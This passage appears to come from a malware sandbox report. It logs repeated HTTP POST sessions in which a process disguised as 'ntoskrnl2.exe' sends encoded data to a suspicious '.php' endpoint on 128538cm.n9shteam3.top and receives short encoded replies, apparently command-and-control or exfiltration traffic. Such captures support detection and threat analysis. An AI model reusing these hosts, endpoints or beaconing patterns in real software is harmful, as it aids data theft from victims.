                                                            Data Ascii: UUZV^IYQ[_VZW_P]U_^BP^ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$!*=(,$"%^$]<,;'<9(;8P>$Z):\9%^./]+
                                                            Sep 2, 2024 13:33:48.558787107 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:48.685179949 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.6 | 49743 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:48.035248041 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:48.391341925 CEST | 1340 | OUT | Data Raw: 55 5e 5a 53 5b 45 5c 53 5b 5f 56 5a 57 5e 50 5a 55 50 5e 42 50 59 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZS[E\S[_VZW^PZUP^BPYZ^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[02-($0Z0=6Y?=\848&,-*(;*$>2=-:%^./]+$
                                                            Sep 2, 2024 13:33:48.699379921 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:48.852103949 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 1e 20 42 2c 08 32 38 2f 07 3d 39 2e 1d 2b 3e 24 45 3a 3c 20 5a 27 3a 3b 5b 28 31 32 08 32 3a 35 58 2b 3f 29 10 28 1c 3e 0c 22 34 20 5b 03 1f 25 5a 37 0c 39 0f 25 06 0f 10 27 34 21 04 22 37 02 5c 29 3e 29 09 33 03 16 59 23 21 31 0c 2c 3d 08 53 27 2b 24 5a 3a 3c 29 04 25 04 2a 56 08 16 38 57 3f 5a 26 14 37 27 2f 58 21 38 00 0d 37 1f 33 51 25 30 3f 56 24 2a 21 1f 33 00 33 50 29 2d 27 14 27 17 39 5f 20 1d 08 0d 39 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: B,28/=9.+>$E:< Z':;[(122:5X+?)(>"4 [%Z79%'4!"7\)>)3Y#!1,=S'+$Z:<)%*V8W?Z&7'/X!873Q%0?V$*!33P)-''9_ 99$P.-V0WS
                                                            Sep 2, 2024 13:33:49.070574999 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 1e 20 42 2c 08 32 38 2f 07 3d 39 2e 1d 2b 3e 24 45 3a 3c 20 5a 27 3a 3b 5b 28 31 32 08 32 3a 35 58 2b 3f 29 10 28 1c 3e 0c 22 34 20 5b 03 1f 25 5a 37 0c 39 0f 25 06 0f 10 27 34 21 04 22 37 02 5c 29 3e 29 09 33 03 16 59 23 21 31 0c 2c 3d 08 53 27 2b 24 5a 3a 3c 29 04 25 04 2a 56 08 16 38 57 3f 5a 26 14 37 27 2f 58 21 38 00 0d 37 1f 33 51 25 30 3f 56 24 2a 21 1f 33 00 33 50 29 2d 27 14 27 17 39 5f 20 1d 08 0d 39 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: B,28/=9.+>$E:< Z':;[(122:5X+?)(>"4 [%Z79%'4!"7\)>)3Y#!1,=S'+$Z:<)%*V8W?Z&7'/X!873Q%0?V$*!33P)-''9_ 99$P.-V0WS


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.6 | 49744 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:48.814795017 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:49.165401936 CEST | 1024 | OUT | Data Raw: 55 57 5f 51 5e 49 5c 51 5b 5f 56 5a 57 5d 50 5b 55 58 5e 43 50 58 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UW_Q^I\Q[_VZW]P[UX^CPXZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z'"%+^?_%"=Y'-:( ,480<%R(('>;?"5-%^./]+,
                                                            Sep 2, 2024 13:33:49.496167898 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:49.630851984 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.6 | 49745 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:50.815675974 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:51.182663918 CEST | 1024 | OUT | Data Raw: 55 51 5f 55 5b 45 5c 51 5b 5f 56 5a 57 5d 50 5e 55 50 5e 48 50 58 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQ_U[E\Q[_VZW]P^UP^HPXZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'_'12?(']'5%>+(Z/7 ]3,9(^;=4=1.%^./]+8
                                                            Sep 2, 2024 13:33:51.458148003 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:51.584599018 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.6 | 49746 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:51.720474958 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:52.072122097 CEST | 1028 | OUT | Data Raw: 55 57 5f 54 5e 42 5c 54 5b 5f 56 5a 57 5e 50 53 55 5b 5e 45 50 52 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UW_T^B\T[_VZW^PSU[^EPRZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''-X=( 3"$5([7/<]'Z5S*+ U>$$X>&Y/*%^./]+$
                                                            Sep 2, 2024 13:33:52.364274979 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:52.489216089 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.6 | 49752 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:52.627821922 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:52.978007078 CEST | 1028 | OUT | Data Raw: 50 54 5a 51 5e 44 59 52 5b 5f 56 5a 57 59 50 53 55 5e 5e 49 50 5e 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PTZQ^DYR[_VZWYPSU^^IP^Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'32&+^+0":$=1?-<Z/ ]0<W(?>$8[>!5:*%^./]+8
                                                            Sep 2, 2024 13:33:53.279985905 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:53.458178043 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.6 | 49753 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:53.614917994 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:53.964237928 CEST | 1028 | OUT | Data Raw: 50 51 5a 57 5e 49 59 52 5b 5f 56 5a 57 59 50 5d 55 5f 5e 47 50 5b 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZW^IYR[_VZWYP]U_^GP[Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'')=;?_'1X0>X([#;$\0<9U?U>4Y)9:*%^./]+8
                                                            Sep 2, 2024 13:33:54.281526089 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:54.406864882 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            14 | 192.168.2.6 | 49755 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:53.860596895 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:54.212327003 CEST | 1340 | OUT | Data Raw: 55 5f 5f 56 5b 45 5c 51 5b 5f 56 5a 57 54 50 59 55 5e 5e 49 50 5e 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U__V[E\Q[_VZWTPYU^^IP^ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^'!9?8;3%Z$X2+><_8$\'Z9R(;=$^=1"-*%^./]+
                                                            Sep 2, 2024 13:33:54.530071974 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:54.654880047 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 10 37 34 2f 12 31 38 30 5b 3d 39 2a 5e 28 5b 38 0b 3a 3c 30 11 30 2a 3f 1d 3c 31 3d 50 25 39 2e 04 3d 02 3e 05 2b 22 39 1e 22 1e 20 5b 03 1f 25 5c 23 22 2e 1c 25 5e 21 10 24 37 35 06 21 37 24 14 3d 2d 31 08 30 3e 20 11 21 22 3d 0d 2d 2d 2e 1a 25 16 0a 5b 2d 2c 2e 5d 25 2e 2a 56 08 16 38 55 3f 05 39 07 23 19 2c 00 23 01 35 1e 21 26 09 51 25 33 2c 0f 27 04 03 11 24 07 27 55 3d 2e 2b 1b 26 2a 3a 07 23 0a 3e 09 2d 29 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: 74/180[=9*^([8:<00*?<1=P%9.=>+"9" [%\#".%^!$75!7$=-10> !"=--.%[-,.]%.*V8U?9#,#5!&Q%3,'$'U=.+&*:#>-)$P.-V0WS


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            15 | 192.168.2.6 | 49758 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:54.568694115 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:54.915951967 CEST | 1028 | OUT | Data Raw: 55 5e 5a 57 5e 49 59 52 5b 5f 56 5a 57 55 50 5b 55 51 5e 40 50 5e 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZW^IYR[_VZWUP[UQ^@P^ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3)<_0"9_'=9<-/$,9?+ T=40^*=.*%^./]+
                                                            Sep 2, 2024 13:33:55.216475964 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:55.345035076 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            16 | 192.168.2.6 | 49759 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:55.473639011 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:55.822818995 CEST | 1028 | OUT | Data Raw: 50 55 5a 51 5e 40 59 52 5b 5f 56 5a 57 5a 50 53 55 50 5e 48 50 5c 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZQ^@YR[_VZWZPSUP^HP\Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!-(;($5Y%>2X(7;8'Z=R<(*;)2%/*%^./]+
                                                            Sep 2, 2024 13:33:56.127371073 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:56.255502939 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            17 | 192.168.2.6 | 49760 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:56.417265892 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:56.784929991 CEST | 1028 | OUT | Data Raw: 55 56 5a 50 5e 48 59 53 5b 5f 56 5a 57 5b 50 52 55 59 5e 48 50 52 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UVZP^HYS[_VZW[PRUY^HPRZ_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!?;73%['-9<[#8'$\&<)V<'*(="5.:%^./]+0
                                                            Sep 2, 2024 13:33:57.072036028 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:57.196912050 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:33:57.410520077 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            18 | 192.168.2.6 | 49761 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:57.883791924 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:58.239264965 CEST | 1028 | OUT | Data: request body (1028 bytes)
                                                            Sep 2, 2024 13:33:58.573275089 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:58.706664085 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            19 | 192.168.2.6 | 49762 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:58.918984890 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:59.282171011 CEST | 1024 | OUT | Data: request body (1024 bytes)
                                                            Sep 2, 2024 13:33:59.592603922 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:59.724842072 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            20 | 192.168.2.6 | 49763 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:59.672164917 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:00.300123930 CEST | 1340 | OUT | Data: request body (1340 bytes)
                                                            Sep 2, 2024 13:34:00.319933891 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:00.938582897 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            21 | 192.168.2.6 | 49764 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:00.664923906 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
